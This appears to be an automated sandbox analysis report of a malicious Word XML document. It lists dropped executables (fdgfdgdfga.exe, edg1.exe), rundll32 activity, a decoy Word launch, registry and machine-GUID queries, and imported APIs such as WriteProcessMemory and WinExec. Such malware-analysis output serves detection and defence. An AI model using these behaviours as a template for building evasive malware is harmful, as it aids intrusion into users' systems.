Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\edg1.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\edg1.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\edg1.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXERegistry key monitored for changes: \REGISTRY\USER
Starts Microsoft Word (often done to prevent that the user detects that something wrong)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLED.EXEProcess created: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Language, Device and Operating System Detection:

barindex
Contains functionality to create pipes for IPCShow sources
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Contains functionality to query local / system timeShow sources
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Contains functionality to query time zone informationShow sources
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Contains functionality to query windows versionShow sources
Source: C:\edg1.exeCode function: 3_2_00404002 GetVersionExA,3_2_00404002
Queries the cryptographic machine GUIDShow sources
Source: C:\edg1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of WindowsShow sources
Source: C:\edg1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: C:\edg1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: C:\WINDOWS\system32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Queries the installation date of WindowsShow sources
Source: C:\edg1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEQeruies volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEQeruies volume information: C:\word.xml VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEQeruies volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEQeruies volume information: C:\ VolumeInformation

Yara Overview

No Yara matches

Screenshot